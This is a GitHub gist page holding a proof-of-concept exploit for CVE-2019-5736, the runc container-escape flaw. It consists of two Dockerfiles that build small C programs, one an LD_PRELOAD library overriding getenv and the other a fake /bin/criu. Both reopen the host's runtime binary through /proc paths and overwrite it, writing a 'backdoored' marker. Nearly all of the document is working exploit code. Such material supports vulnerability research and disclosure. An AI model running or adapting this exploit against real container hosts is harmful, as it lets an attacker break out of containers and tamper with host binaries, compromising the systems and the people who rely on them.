Skip to content

Instantly share code, notes, and snippets.

@wbowling
Last active Apr 16, 2019
Embed
What would you like to do?
POC for CVE-2019-5736
FROM ubuntu
RUN apt-get update -y && apt-get install -y gcc
RUN ( \
echo '#define _GNU_SOURCE'; \
echo '#include <fcntl.h>'; \
echo '#include <stdio.h>'; \
echo '#include <unistd.h>'; \
\
echo 'char *getenv(const char *__name) {'; \
echo 'int fd = open("/proc/self/exe", O_PATH);'; \
echo 'char path[20] = {0};'; \
\
echo 'snprintf(path, sizeof(path), "/proc/self/fd/%d", fd);'; \
echo 'char cmd[100] = {0};'; \
\
echo 'snprintf(cmd, sizeof(cmd), "sleep 1; echo backdoored >> %s", path);'; \
echo 'char *argv[] = {"/bin/sh", "-c", cmd, NULL};'; \
echo 'execve("/bin/sh", argv, NULL);'; \
\
echo '}'; \
) > pwn.c
RUN gcc -shared -fPIC pwn.c -o /pwn.so
ENV LD_PRELOAD /pwn.so
ENTRYPOINT ["/proc/self/exe"]
FROM ubuntu
RUN apt-get update -y && apt-get install -y gcc
RUN ["/proc/self/exe", "spec"]
RUN mkdir rootfs
RUN ( \
echo '#define _GNU_SOURCE'; \
echo '#include <fcntl.h>'; \
echo '#include <stdio.h>'; \
echo '#include <unistd.h>'; \
\
echo 'void main() {'; \
echo ' int fd = open("/proc/1/exe", O_PATH);'; \
echo ' char path[20] = {0};'; \
\
echo ' snprintf(path, sizeof(path), "/proc/self/fd/%d", fd);'; \
echo ' char cmd[100] = {0};'; \
\
echo ' snprintf(cmd, sizeof(cmd), "sleep 1; echo backdoored >> %s", path);'; \
echo ' char *argv[] = {"/bin/sh", "-c", cmd, NULL};'; \
echo ' execve("/bin/sh", argv, NULL);'; \
\
echo '}'; \
) > pwn.c
RUN gcc pwn.c -o /bin/criu
ENTRYPOINT ["/proc/self/exe", "restore", "vakzz"]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment